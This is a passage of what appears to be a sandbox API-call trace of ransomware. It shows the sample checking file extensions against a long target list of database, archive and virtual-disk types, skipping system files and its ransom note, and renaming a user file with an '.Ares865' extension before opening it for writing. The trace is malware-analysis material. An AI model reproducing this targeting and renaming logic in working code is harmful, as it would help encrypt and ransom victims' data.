(lpString="Documents.mydocs") returned 16 [0059.003] lstrlenW (lpString="bak") returned 3 [0059.003] lstrcmpiW (lpString1="ocs", lpString2="bak") returned 1 [0059.003] lstrlenW (lpString="ba_") returned 3 [0059.003] lstrcmpiW (lpString1="ocs", lpString2="ba_") returned 1 [0059.003] lstrlenW (lpString="dbb") returned 3 [0059.003] lstrcmpiW (lpString1="ocs", lpString2="dbb") returned 1 [0059.003] lstrlenW (lpString="vmdk") returned 4 [0059.003] lstrcmpiW (lpString1="docs", lpString2="vmdk") returned -1 [0059.003] lstrlenW (lpString="rar") returned 3 [0059.003] lstrcmpiW (lpString1="ocs", lpString2="rar") returned -1 [0059.003] lstrlenW (lpString="zip") returned 3 [0059.003] lstrcmpiW (lpString1="ocs", lpString2="zip") returned -1 [0059.003] lstrlenW (lpString="tgz") returned 3 [0059.003] lstrcmpiW (lpString1="ocs", lpString2="tgz") returned -1 [0059.003] lstrlenW (lpString="vbox") returned 4 [0059.004] lstrcmpiW (lpString1="docs", lpString2="vbox") returned -1 [0059.004] lstrlenW (lpString="vdi") returned 3 [0059.004] lstrcmpiW (lpString1="ocs", lpString2="vdi") returned -1 [0059.004] lstrlenW (lpString="vhd") returned 3 [0059.004] lstrcmpiW (lpString1="ocs", lpString2="vhd") returned -1 [0059.004] lstrlenW (lpString="vhdx") returned 4 [0059.004] lstrcmpiW (lpString1="docs", lpString2="vhdx") returned -1 [0059.004] lstrlenW (lpString="avhd") returned 4 [0059.004] lstrcmpiW (lpString1="docs", lpString2="avhd") returned 1 [0059.004] lstrlenW (lpString="db") returned 2 [0059.004] lstrcmpiW (lpString1="cs", lpString2="db") returned -1 [0059.004] lstrlenW (lpString="db2") returned 3 [0059.004] lstrcmpiW (lpString1="ocs", lpString2="db2") returned 1 [0059.004] lstrlenW (lpString="db3") returned 3 [0059.004] lstrcmpiW (lpString1="ocs", lpString2="db3") returned 1 [0059.004] lstrlenW (lpString="dbf") returned 3 [0059.004] lstrcmpiW (lpString1="ocs", lpString2="dbf") returned 1 [0059.004] lstrlenW (lpString="mdf") returned 3 [0059.004] lstrcmpiW (lpString1="ocs", lpString2="mdf") returned 1 [0059.004] lstrlenW (lpString="mdb") returned 3 [0059.004] lstrcmpiW (lpString1="ocs", lpString2="mdb") returned 1 [0059.004] lstrlenW (lpString="sql") returned 3 [0059.004] lstrcmpiW (lpString1="ocs", lpString2="sql") returned -1 [0059.004] lstrlenW (lpString="sqlite") returned 6 [0059.004] lstrcmpiW (lpString1="mydocs", lpString2="sqlite") returned -1 [0059.004] lstrlenW (lpString="sqlite3") returned 7 [0059.004] lstrcmpiW (lpString1=".mydocs", lpString2="sqlite3") returned -1 [0059.004] lstrlenW (lpString="sqlitedb") returned 8 [0059.004] lstrcmpiW (lpString1="s.mydocs", lpString2="sqlitedb") returned -1 [0059.004] lstrlenW (lpString="xml") returned 3 [0059.004] lstrcmpiW (lpString1="ocs", lpString2="xml") returned -1 [0059.004] lstrlenW (lpString="$er") returned 3 [0059.004] lstrcmpiW (lpString1="ocs", lpString2="$er") returned 1 [0059.004] lstrlenW (lpString="4dd") returned 3 [0059.004] lstrcmpiW (lpString1="ocs", lpString2="4dd") returned 1 [0059.004] lstrlenW (lpString="4dl") returned 3 [0059.004] lstrcmpiW (lpString1="ocs", lpString2="4dl") returned 1 [0059.004] lstrlenW (lpString="^^^") returned 3 [0059.005] lstrcmpiW (lpString1="ocs", lpString2="^^^") returned 1 [0059.005] lstrlenW (lpString="abs") returned 3 [0059.005] lstrcmpiW (lpString1="ocs", lpString2="abs") returned 1 [0059.005] lstrlenW (lpString="abx") returned 3 [0059.005] lstrcmpiW (lpString1="ocs", lpString2="abx") returned 1 [0059.005] lstrlenW (lpString="accdb") returned 5 [0059.005] lstrcmpiW (lpString1="ydocs", lpString2="accdb") returned 1 [0059.005] lstrlenW (lpString="accdc") returned 5 [0059.005] lstrcmpiW (lpString1="ydocs", lpString2="accdc") returned 1 [0059.005] lstrlenW (lpString="accde") returned 5 [0059.005] lstrcmpiW (lpString1="ydocs", lpString2="accde") returned 1 [0059.005] lstrlenW (lpString="accdr") returned 5 [0059.005] lstrcmpiW (lpString1="ydocs", lpString2="accdr") returned 1 [0059.005] lstrlenW (lpString="accdt") returned 5 [0059.005] lstrcmpiW (lpString1="ydocs", lpString2="accdt") returned 1 [0059.005] lstrlenW (lpString="accdw") returned 5 [0059.005] lstrcmpiW (lpString1="ydocs", lpString2="accdw") returned 1 [0059.005] lstrlenW (lpString="accft") returned 5 [0059.005] lstrcmpiW (lpString1="ydocs", lpString2="accft") returned 1 [0059.005] lstrlenW (lpString="adb") returned 3 [0059.005] lstrcmpiW (lpString1="ocs", lpString2="adb") returned 1 [0059.005] lstrlenW (lpString="adb") returned 3 [0059.005] lstrcmpiW (lpString1="ocs", lpString2="adb") returned 1 [0059.005] lstrlenW (lpString="ade") returned 3 [0059.005] lstrcmpiW (lpString1="ocs", lpString2="ade") returned 1 [0059.005] lstrlenW (lpString="adf") returned 3 [0059.005] lstrcmpiW (lpString1="ocs", lpString2="adf") returned 1 [0059.005] lstrlenW (lpString="adn") returned 3 [0059.005] lstrcmpiW (lpString1="ocs", lpString2="adn") returned 1 [0059.005] lstrlenW (lpString="adp") returned 3 [0059.005] lstrcmpiW (lpString1="ocs", lpString2="adp") returned 1 [0059.005] lstrlenW (lpString="alf") returned 3 [0059.005] lstrcmpiW (lpString1="ocs", lpString2="alf") returned 1 [0059.005] lstrlenW (lpString="ask") returned 3 [0059.005] lstrcmpiW (lpString1="ocs", lpString2="ask") returned 1 [0059.005] lstrlenW (lpString="btr") returned 3 [0059.005] lstrcmpiW (lpString1="ocs", lpString2="btr") returned 1 [0059.006] lstrlenW (lpString="cat") returned 3 [0059.006] lstrcmpiW (lpString1="ocs", lpString2="cat") returned 1 [0059.006] lstrlenW (lpString="cdb") returned 3 [0059.006] lstrcmpiW (lpString1="ocs", lpString2="cdb") returned 1 [0059.006] lstrlenW (lpString="ckp") returned 3 [0059.006] lstrcmpiW (lpString1="ocs", lpString2="ckp") returned 1 [0059.006] lstrlenW (lpString="cma") returned 3 [0059.006] lstrcmpiW (lpString1="ocs", lpString2="cma") returned 1 [0059.006] lstrlenW (lpString="cpd") returned 3 [0059.006] lstrcmpiW (lpString1="ocs", lpString2="cpd") returned 1 [0059.006] lstrlenW (lpString="dacpac") returned 6 [0059.006] lstrcmpiW (lpString1="mydocs", lpString2="dacpac") returned 1 [0059.006] lstrlenW (lpString="dad") returned 3 [0059.006] lstrcmpiW (lpString1="ocs", lpString2="dad") returned 1 [0059.006] lstrlenW (lpString="dadiagrams") returned 10 [0059.006] lstrcmpiW (lpString1="nts.mydocs", lpString2="dadiagrams") returned 1 [0059.006] lstrlenW (lpString="daschema") returned 8 [0059.006] lstrcmpiW (lpString1="s.mydocs", lpString2="daschema") returned 1 [0059.006] lstrlenW (lpString="db-journal") returned 10 [0059.006] lstrcmpiW (lpString1="nts.mydocs", lpString2="db-journal") returned 1 [0059.006] lstrlenW (lpString="db-shm") returned 6 [0059.006] lstrcmpiW (lpString1="mydocs", lpString2="db-shm") returned 1 [0059.006] lstrlenW (lpString="db-wal") returned 6 [0059.006] lstrcmpiW (lpString1="mydocs", lpString2="db-wal") returned 1 [0059.006] lstrlenW (lpString="dbc") returned 3 [0059.006] lstrcmpiW (lpString1="ocs", lpString2="dbc") returned 1 [0059.006] lstrlenW (lpString="dbs") returned 3 [0059.006] lstrcmpiW (lpString1="ocs", lpString2="dbs") returned 1 [0059.006] lstrlenW (lpString="dbt") returned 3 [0059.006] lstrcmpiW (lpString1="ocs", lpString2="dbt") returned 1 [0059.006] lstrlenW (lpString="dbv") returned 3 [0059.006] lstrcmpiW (lpString1="ocs", lpString2="dbv") returned 1 [0059.006] lstrlenW (lpString="dbx") returned 3 [0059.006] lstrcmpiW (lpString1="ocs", lpString2="dbx") returned 1 [0059.006] lstrlenW (lpString="dcb") returned 3 [0059.006] lstrcmpiW (lpString1="ocs", lpString2="dcb") returned 1 [0059.007] lstrlenW (lpString="dct") returned 3 [0059.007] lstrcmpiW (lpString1="ocs", lpString2="dct") returned 1 [0059.007] lstrlenW (lpString="dcx") returned 3 [0059.007] lstrcmpiW (lpString1="ocs", lpString2="dcx") returned 1 [0059.007] lstrlenW (lpString="ddl") returned 3 [0059.007] lstrcmpiW (lpString1="ocs", lpString2="ddl") returned 1 [0059.007] lstrlenW (lpString="dlis") returned 4 [0059.007] lstrcmpiW (lpString1="docs", lpString2="dlis") returned 1 [0059.007] lstrlenW (lpString="dp1") returned 3 [0059.007] lstrcmpiW (lpString1="ocs", lpString2="dp1") returned 1 [0059.007] lstrlenW (lpString="dqy") returned 3 [0059.007] lstrcmpiW (lpString1="ocs", lpString2="dqy") returned 1 [0059.007] lstrlenW (lpString="dsk") returned 3 [0059.007] lstrcmpiW (lpString1="ocs", lpString2="dsk") returned 1 [0059.007] lstrlenW (lpString="dsn") returned 3 [0059.007] lstrcmpiW (lpString1="ocs", lpString2="dsn") returned 1 [0059.007] lstrlenW (lpString="dtsx") returned 4 [0059.007] lstrcmpiW (lpString1="docs", lpString2="dtsx") returned -1 [0059.007] lstrlenW (lpString="dxl") returned 3 [0059.007] lstrcmpiW (lpString1="ocs", lpString2="dxl") returned 1 [0059.007] lstrlenW (lpString="eco") returned 3 [0059.007] lstrcmpiW (lpString1="ocs", lpString2="eco") returned 1 [0059.007] lstrlenW (lpString="ecx") returned 3 [0059.007] lstrcmpiW (lpString1="ocs", lpString2="ecx") returned 1 [0059.007] lstrlenW (lpString="edb") returned 3 [0059.007] lstrcmpiW (lpString1="ocs", lpString2="edb") returned 1 [0059.007] lstrlenW (lpString="epim") returned 4 [0059.007] lstrcmpiW (lpString1="docs", lpString2="epim") returned -1 [0059.007] lstrlenW (lpString="fcd") returned 3 [0059.007] lstrcmpiW (lpString1="ocs", lpString2="fcd") returned 1 [0059.007] lstrlenW (lpString="fdb") returned 3 [0059.007] lstrcmpiW (lpString1="ocs", lpString2="fdb") returned 1 [0059.007] lstrlenW (lpString="fic") returned 3 [0059.007] lstrcmpiW (lpString1="ocs", lpString2="fic") returned 1 [0059.007] lstrlenW (lpString="flexolibrary") returned 12 [0059.007] lstrcmpiW (lpString1="ments.mydocs", lpString2="flexolibrary") returned 1 [0059.007] lstrlenW (lpString="fm5") returned 3 [0059.007] lstrcmpiW (lpString1="ocs", lpString2="fm5") returned 1 [0059.008] lstrlenW (lpString="fmp") returned 3 [0059.008] lstrcmpiW (lpString1="ocs", lpString2="fmp") returned 1 [0059.008] lstrlenW (lpString="fmp12") returned 5 [0059.008] lstrcmpiW (lpString1="ydocs", lpString2="fmp12") returned 1 [0059.008] lstrlenW (lpString="fmpsl") returned 5 [0059.008] lstrcmpiW (lpString1="ydocs", lpString2="fmpsl") returned 1 [0059.008] lstrlenW (lpString="fol") returned 3 [0059.008] lstrcmpiW (lpString1="ocs", lpString2="fol") returned 1 [0059.008] lstrlenW (lpString="fp3") returned 3 [0059.008] lstrcmpiW (lpString1="ocs", lpString2="fp3") returned 1 [0059.008] lstrlenW (lpString="fp4") returned 3 [0059.008] lstrcmpiW (lpString1="ocs", lpString2="fp4") returned 1 [0059.008] lstrlenW (lpString="fp5") returned 3 [0059.008] lstrcmpiW (lpString1="ocs", lpString2="fp5") returned 1 [0059.008] lstrlenW (lpString="fp7") returned 3 [0059.008] lstrcmpiW (lpString1="ocs", lpString2="fp7") returned 1 [0059.008] lstrlenW (lpString="fpt") returned 3 [0059.008] lstrcmpiW (lpString1="ocs", lpString2="fpt") returned 1 [0059.008] lstrlenW (lpString="frm") returned 3 [0059.008] lstrcmpiW (lpString1="ocs", lpString2="frm") returned 1 [0059.008] lstrlenW (lpString="gdb") returned 3 [0059.008] lstrcmpiW (lpString1="ocs", lpString2="gdb") returned 1 [0059.008] lstrlenW (lpString="gdb") returned 3 [0059.008] lstrcmpiW (lpString1="ocs", lpString2="gdb") returned 1 [0059.008] lstrlenW (lpString="grdb") returned 4 [0059.008] lstrcmpiW (lpString1="docs", lpString2="grdb") returned -1 [0059.008] lstrlenW (lpString="gwi") returned 3 [0059.008] lstrcmpiW (lpString1="ocs", lpString2="gwi") returned 1 [0059.008] lstrlenW (lpString="hdb") returned 3 [0059.008] lstrcmpiW (lpString1="ocs", lpString2="hdb") returned 1 [0059.008] lstrlenW (lpString="his") returned 3 [0059.008] lstrcmpiW (lpString1="ocs", lpString2="his") returned 1 [0059.008] lstrlenW (lpString="ib") returned 2 [0059.008] lstrcmpiW (lpString1="cs", lpString2="ib") returned -1 [0059.008] lstrlenW (lpString="idb") returned 3 [0059.008] lstrcmpiW (lpString1="ocs", lpString2="idb") returned 1 [0059.008] lstrlenW (lpString="ihx") returned 3 [0059.008] lstrcmpiW (lpString1="ocs", lpString2="ihx") returned 1 [0059.008] lstrlenW (lpString="itdb") returned 4 [0059.009] lstrcmpiW (lpString1="docs", lpString2="itdb") returned -1 [0059.009] lstrlenW (lpString="itw") returned 3 [0059.009] lstrcmpiW (lpString1="ocs", lpString2="itw") returned 1 [0059.009] lstrlenW (lpString="jet") returned 3 [0059.009] lstrcmpiW (lpString1="ocs", lpString2="jet") returned 1 [0059.009] lstrlenW (lpString="jtx") returned 3 [0059.009] lstrcmpiW (lpString1="ocs", lpString2="jtx") returned 1 [0059.009] lstrlenW (lpString="kdb") returned 3 [0059.009] lstrcmpiW (lpString1="ocs", lpString2="kdb") returned 1 [0059.009] lstrlenW (lpString="kexi") returned 4 [0059.009] lstrcmpiW (lpString1="docs", lpString2="kexi") returned -1 [0059.009] lstrlenW (lpString="kexic") returned 5 [0059.009] lstrcmpiW (lpString1="ydocs", lpString2="kexic") returned 1 [0059.009] lstrlenW (lpString="kexis") returned 5 [0059.009] lstrcmpiW (lpString1="ydocs", lpString2="kexis") returned 1 [0059.009] lstrlenW (lpString="lgc") returned 3 [0059.009] lstrcmpiW (lpString1="ocs", lpString2="lgc") returned 1 [0059.009] lstrlenW (lpString="lwx") returned 3 [0059.009] lstrcmpiW (lpString1="ocs", lpString2="lwx") returned 1 [0059.009] lstrlenW (lpString="maf") returned 3 [0059.009] lstrcmpiW (lpString1="ocs", lpString2="maf") returned 1 [0059.009] lstrlenW (lpString="maq") returned 3 [0059.009] lstrcmpiW (lpString1="ocs", lpString2="maq") returned 1 [0059.009] lstrlenW (lpString="mar") returned 3 [0059.009] lstrcmpiW (lpString1="ocs", lpString2="mar") returned 1 [0059.009] lstrlenW (lpString="marshal") returned 7 [0059.009] lstrcmpiW (lpString1=".mydocs", lpString2="marshal") returned -1 [0059.009] lstrlenW (lpString="mas") returned 3 [0059.009] lstrcmpiW (lpString1="ocs", lpString2="mas") returned 1 [0059.009] lstrlenW (lpString="mav") returned 3 [0059.010] lstrcmpiW (lpString1="ocs", lpString2="mav") returned 1 [0059.010] lstrlenW (lpString="maw") returned 3 [0059.010] lstrcmpiW (lpString1="ocs", lpString2="maw") returned 1 [0059.010] lstrlenW (lpString="mdbhtml") returned 7 [0059.010] lstrcmpiW (lpString1=".mydocs", lpString2="mdbhtml") returned -1 [0059.010] lstrlenW (lpString="mdn") returned 3 [0059.010] lstrcmpiW (lpString1="ocs", lpString2="mdn") returned 1 [0059.010] lstrlenW (lpString="mdt") returned 3 [0059.010] lstrcmpiW (lpString1="ocs", lpString2="mdt") returned 1 [0059.010] lstrlenW (lpString="mfd") returned 3 [0059.010] lstrcmpiW (lpString1="ocs", lpString2="mfd") returned 1 [0059.010] lstrlenW (lpString="mpd") returned 3 [0059.010] lstrcmpiW (lpString1="ocs", lpString2="mpd") returned 1 [0059.010] lstrlenW (lpString="mrg") returned 3 [0059.010] lstrcmpiW (lpString1="ocs", lpString2="mrg") returned 1 [0059.010] lstrlenW (lpString="mud") returned 3 [0059.010] lstrcmpiW (lpString1="ocs", lpString2="mud") returned 1 [0059.010] lstrlenW (lpString="mwb") returned 3 [0059.010] lstrcmpiW (lpString1="ocs", lpString2="mwb") returned 1 [0059.010] lstrlenW (lpString="myd") returned 3 [0059.010] lstrcmpiW (lpString1="ocs", lpString2="myd") returned 1 [0059.010] lstrlenW (lpString="ndf") returned 3 [0059.010] lstrcmpiW (lpString1="ocs", lpString2="ndf") returned 1 [0059.010] lstrlenW (lpString="nnt") returned 3 [0059.010] lstrcmpiW (lpString1="ocs", lpString2="nnt") returned 1 [0059.010] lstrlenW (lpString="nrmlib") returned 6 [0059.010] lstrcmpiW (lpString1="mydocs", lpString2="nrmlib") returned -1 [0059.010] lstrlenW (lpString="ns2") returned 3 [0059.010] lstrcmpiW (lpString1="ocs", lpString2="ns2") returned 1 [0059.010] lstrlenW (lpString="ns3") returned 3 [0059.010] lstrcmpiW (lpString1="ocs", lpString2="ns3") returned 1 [0059.010] lstrlenW (lpString="ns4") returned 3 [0059.010] lstrcmpiW (lpString1="ocs", lpString2="ns4") returned 1 [0059.010] lstrlenW (lpString="nsf") returned 3 [0059.010] lstrcmpiW (lpString1="ocs", lpString2="nsf") returned 1 [0059.010] lstrlenW (lpString="nv") returned 2 [0059.010] lstrcmpiW (lpString1="cs", lpString2="nv") returned -1 [0059.010] lstrlenW (lpString="nv2") returned 3 [0059.011] lstrcmpiW (lpString1="ocs", lpString2="nv2") returned 1 [0059.011] lstrlenW (lpString="nwdb") returned 4 [0059.011] lstrcmpiW (lpString1="docs", lpString2="nwdb") returned -1 [0059.011] lstrlenW (lpString="nyf") returned 3 [0059.011] lstrcmpiW (lpString1="ocs", lpString2="nyf") returned 1 [0059.011] lstrlenW (lpString="odb") returned 3 [0059.011] lstrcmpiW (lpString1="ocs", lpString2="odb") returned -1 [0059.011] lstrlenW (lpString="odb") returned 3 [0059.011] lstrcmpiW (lpString1="ocs", lpString2="odb") returned -1 [0059.011] lstrlenW (lpString="oqy") returned 3 [0059.011] lstrcmpiW (lpString1="ocs", lpString2="oqy") returned -1 [0059.011] lstrlenW (lpString="ora") returned 3 [0059.011] lstrcmpiW (lpString1="ocs", lpString2="ora") returned -1 [0059.011] lstrlenW (lpString="orx") returned 3 [0059.011] lstrcmpiW (lpString1="ocs", lpString2="orx") returned -1 [0059.011] lstrlenW (lpString="owc") returned 3 [0059.011] lstrcmpiW (lpString1="ocs", lpString2="owc") returned -1 [0059.011] lstrlenW (lpString="p96") returned 3 [0059.011] lstrcmpiW (lpString1="ocs", lpString2="p96") returned -1 [0059.011] lstrlenW (lpString="p97") returned 3 [0059.011] lstrcmpiW (lpString1="ocs", lpString2="p97") returned -1 [0059.011] lstrlenW (lpString="pan") returned 3 [0059.011] lstrcmpiW (lpString1="ocs", lpString2="pan") returned -1 [0059.011] lstrlenW (lpString="pdb") returned 3 [0059.011] lstrcmpiW (lpString1="ocs", lpString2="pdb") returned -1 [0059.011] lstrlenW (lpString="pdm") returned 3 [0059.011] lstrcmpiW (lpString1="ocs", lpString2="pdm") returned -1 [0059.011] lstrlenW (lpString="pnz") returned 3 [0059.011] lstrcmpiW (lpString1="ocs", lpString2="pnz") returned -1 [0059.011] lstrlenW (lpString="qry") returned 3 [0059.011] lstrcmpiW (lpString1="ocs", lpString2="qry") returned -1 [0059.011] lstrlenW (lpString="qvd") returned 3 [0059.011] lstrcmpiW (lpString1="ocs", lpString2="qvd") returned -1 [0059.011] lstrlenW (lpString="rbf") returned 3 [0059.011] lstrcmpiW (lpString1="ocs", lpString2="rbf") returned -1 [0059.011] lstrlenW (lpString="rctd") returned 4 [0059.011] lstrcmpiW (lpString1="docs", lpString2="rctd") returned -1 [0059.011] lstrlenW (lpString="rod") returned 3 [0059.012] lstrcmpiW (lpString1="ocs", lpString2="rod") returned -1 [0059.012] lstrlenW (lpString="rodx") returned 4 [0059.012] lstrcmpiW (lpString1="docs", lpString2="rodx") returned -1 [0059.012] lstrlenW (lpString="rpd") returned 3 [0059.012] lstrcmpiW (lpString1="ocs", lpString2="rpd") returned -1 [0059.012] lstrlenW (lpString="rsd") returned 3 [0059.012] lstrcmpiW (lpString1="ocs", lpString2="rsd") returned -1 [0059.012] lstrlenW (lpString="sas7bdat") returned 8 [0059.012] lstrcmpiW (lpString1="s.mydocs", lpString2="sas7bdat") returned -1 [0059.012] lstrlenW (lpString="sbf") returned 3 [0059.012] lstrcmpiW (lpString1="ocs", lpString2="sbf") returned -1 [0059.012] lstrlenW (lpString="scx") returned 3 [0059.012] lstrcmpiW (lpString1="ocs", lpString2="scx") returned -1 [0059.012] lstrlenW (lpString="sdb") returned 3 [0059.012] lstrcmpiW (lpString1="ocs", lpString2="sdb") returned -1 [0059.012] lstrlenW (lpString="sdc") returned 3 [0059.012] lstrcmpiW (lpString1="ocs", lpString2="sdc") returned -1 [0059.012] lstrlenW (lpString="sdf") returned 3 [0059.012] lstrcmpiW (lpString1="ocs", lpString2="sdf") returned -1 [0059.012] lstrlenW (lpString="sis") returned 3 [0059.012] lstrcmpiW (lpString1="ocs", lpString2="sis") returned -1 [0059.012] lstrlenW (lpString="spq") returned 3 [0059.012] lstrcmpiW (lpString1="ocs", lpString2="spq") returned -1 [0059.012] lstrlenW (lpString="te") returned 2 [0059.012] lstrcmpiW (lpString1="cs", lpString2="te") returned -1 [0059.012] lstrlenW (lpString="teacher") returned 7 [0059.012] lstrcmpiW (lpString1=".mydocs", lpString2="teacher") returned -1 [0059.012] lstrlenW (lpString="tmd") returned 3 [0059.012] lstrcmpiW (lpString1="ocs", lpString2="tmd") returned -1 [0059.012] lstrlenW (lpString="tps") returned 3 [0059.012] lstrcmpiW (lpString1="ocs", lpString2="tps") returned -1 [0059.012] lstrlenW (lpString="trc") returned 3 [0059.012] lstrcmpiW (lpString1="ocs", lpString2="trc") returned -1 [0059.012] lstrlenW (lpString="trc") returned 3 [0059.012] lstrcmpiW (lpString1="ocs", lpString2="trc") returned -1 [0059.012] lstrlenW (lpString="trm") returned 3 [0059.012] lstrcmpiW (lpString1="ocs", lpString2="trm") returned -1 [0059.012] lstrlenW (lpString="udb") returned 3 [0059.012] lstrcmpiW (lpString1="ocs", lpString2="udb") returned -1 [0059.013] lstrlenW (lpString="udl") returned 3 [0059.013] lstrcmpiW (lpString1="ocs", lpString2="udl") returned -1 [0059.013] lstrlenW (lpString="usr") returned 3 [0059.013] lstrcmpiW (lpString1="ocs", lpString2="usr") returned -1 [0059.013] lstrlenW (lpString="v12") returned 3 [0059.013] lstrcmpiW (lpString1="ocs", lpString2="v12") returned -1 [0059.013] lstrlenW (lpString="vis") returned 3 [0059.013] lstrcmpiW (lpString1="ocs", lpString2="vis") returned -1 [0059.013] lstrlenW (lpString="vpd") returned 3 [0059.013] lstrcmpiW (lpString1="ocs", lpString2="vpd") returned -1 [0059.013] lstrlenW (lpString="vvv") returned 3 [0059.013] lstrcmpiW (lpString1="ocs", lpString2="vvv") returned -1 [0059.013] lstrlenW (lpString="wdb") returned 3 [0059.013] lstrcmpiW (lpString1="ocs", lpString2="wdb") returned -1 [0059.013] lstrlenW (lpString="wmdb") returned 4 [0059.013] lstrcmpiW (lpString1="docs", lpString2="wmdb") returned -1 [0059.013] lstrlenW (lpString="wrk") returned 3 [0059.013] lstrcmpiW (lpString1="ocs", lpString2="wrk") returned -1 [0059.013] lstrlenW (lpString="xdb") returned 3 [0059.013] lstrcmpiW (lpString1="ocs", lpString2="xdb") returned -1 [0059.013] lstrlenW (lpString="xld") returned 3 [0059.013] lstrcmpiW (lpString1="ocs", lpString2="xld") returned -1 [0059.013] lstrlenW (lpString="xmlff") returned 5 [0059.013] lstrcmpiW (lpString1="ydocs", lpString2="xmlff") returned 1 [0059.013] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\SendTo\\Documents.mydocs.Ares865") returned 53 [0059.013] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\SendTo\\Documents.mydocs" (normalized: "c:\\users\\default user\\sendto\\documents.mydocs"), lpNewFileName="C:\\Users\\Default User\\SendTo\\Documents.mydocs.Ares865" (normalized: "c:\\users\\default user\\sendto\\documents.mydocs.ares865"), dwFlags=0x1) returned 1 [0059.014] CreateFileW (lpFileName="C:\\Users\\Default User\\SendTo\\Documents.mydocs.Ares865" (normalized: "c:\\users\\default user\\sendto\\documents.mydocs.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0059.014] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=0) returned 1 [0059.014] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0059.014] CloseHandle (hObject=0x0) returned 0 [0059.014] CloseHandle (hObject=0x164) returned 1 [0059.014] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3d802e42, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x63dece0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x3d802e42, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x4d6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Fax Recipient.lnk", cAlternateFileName="FAXREC~1.LNK")) returned 1 [0059.014] lstrcmpiW (lpString1="Fax Recipient.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.014] lstrcmpiW (lpString1="Fax Recipient.lnk", lpString2="aoldtz.exe") returned 1 [0059.014] lstrcmpiW (lpString1="Fax Recipient.lnk", lpString2=".") returned 1 [0059.014] lstrcmpiW (lpString1="Fax Recipient.lnk", lpString2="..") returned 1 [0059.014] lstrcmpiW (lpString1="Fax Recipient.lnk", lpString2="windows") returned -1 [0059.014] lstrcmpiW (lpString1="Fax Recipient.lnk", lpString2="bootmgr") returned 1 [0059.014] lstrcmpiW (lpString1="Fax Recipient.lnk", lpString2="temp") returned -1 [0059.015] lstrcmpiW (lpString1="Fax Recipient.lnk", lpString2="pagefile.sys") returned -1 [0059.015] lstrcmpiW (lpString1="Fax Recipient.lnk", lpString2="boot") returned 1 [0059.015] lstrcmpiW (lpString1="Fax Recipient.lnk", lpString2="ids.txt") returned -1 [0059.015] lstrcmpiW (lpString1="Fax Recipient.lnk", lpString2="ntuser.dat") returned -1 [0059.015] lstrcmpiW (lpString1="Fax Recipient.lnk", lpString2="perflogs") returned -1 [0059.015] lstrcmpiW (lpString1="Fax Recipient.lnk", lpString2="MSBuild") returned -1 [0059.015] lstrlenW (lpString="Fax Recipient.lnk") returned 17 [0059.015] lstrlenW (lpString="C:\\Users\\Default User\\SendTo\\Documents.mydocs") returned 45 [0059.015] lstrcpyW (in: lpString1=0x2cce43a, lpString2="Fax Recipient.lnk" | out: lpString1="Fax Recipient.lnk") returned="Fax Recipient.lnk" [0059.015] lstrlenW (lpString="Fax Recipient.lnk") returned 17 [0059.015] lstrlenW (lpString="Ares865") returned 7 [0059.015] lstrcmpiW (lpString1="ent.lnk", lpString2="Ares865") returned 1 [0059.015] lstrlenW (lpString=".dll") returned 4 [0059.015] lstrcmpiW (lpString1="Fax Recipient.lnk", lpString2=".dll") returned 1 [0059.015] lstrlenW (lpString=".lnk") returned 4 [0059.015] lstrcmpiW (lpString1="Fax Recipient.lnk", lpString2=".lnk") returned 1 [0059.015] lstrlenW (lpString=".ini") returned 4 [0059.015] lstrcmpiW (lpString1="Fax Recipient.lnk", lpString2=".ini") returned 1 [0059.015] lstrlenW (lpString=".sys") returned 4 [0059.015] lstrcmpiW (lpString1="Fax Recipient.lnk", lpString2=".sys") returned 1 [0059.015] lstrlenW (lpString="Fax Recipient.lnk") returned 17 [0059.015] lstrlenW (lpString="bak") returned 3 [0059.015] lstrcmpiW (lpString1="lnk", lpString2="bak") returned 1 [0059.015] lstrlenW (lpString="ba_") returned 3 [0059.015] lstrcmpiW (lpString1="lnk", lpString2="ba_") returned 1 [0059.015] lstrlenW (lpString="dbb") returned 3 [0059.015] lstrcmpiW (lpString1="lnk", lpString2="dbb") returned 1 [0059.015] lstrlenW (lpString="vmdk") returned 4 [0059.015] lstrcmpiW (lpString1=".lnk", lpString2="vmdk") returned -1 [0059.015] lstrlenW (lpString="rar") returned 3 [0059.015] lstrcmpiW (lpString1="lnk", lpString2="rar") returned -1 [0059.015] lstrlenW (lpString="zip") returned 3 [0059.015] lstrcmpiW (lpString1="lnk", lpString2="zip") returned -1 [0059.015] lstrlenW (lpString="tgz") returned 3 [0059.015] lstrcmpiW (lpString1="lnk", lpString2="tgz") returned -1 [0059.015] lstrlenW (lpString="vbox") returned 4 [0059.015] lstrcmpiW (lpString1=".lnk", lpString2="vbox") returned -1 [0059.016] lstrlenW (lpString="vdi") returned 3 [0059.016] lstrcmpiW (lpString1="lnk", lpString2="vdi") returned -1 [0059.016] lstrlenW (lpString="vhd") returned 3 [0059.016] lstrcmpiW (lpString1="lnk", lpString2="vhd") returned -1 [0059.016] lstrlenW (lpString="vhdx") returned 4 [0059.016] lstrcmpiW (lpString1=".lnk", lpString2="vhdx") returned -1 [0059.016] lstrlenW (lpString="avhd") returned 4 [0059.016] lstrcmpiW (lpString1=".lnk", lpString2="avhd") returned -1 [0059.016] lstrlenW (lpString="db") returned 2 [0059.016] lstrcmpiW (lpString1="nk", lpString2="db") returned 1 [0059.016] lstrlenW (lpString="db2") returned 3 [0059.016] lstrcmpiW (lpString1="lnk", lpString2="db2") returned 1 [0059.016] lstrlenW (lpString="db3") returned 3 [0059.016] lstrcmpiW (lpString1="lnk", lpString2="db3") returned 1 [0059.016] lstrlenW (lpString="dbf") returned 3 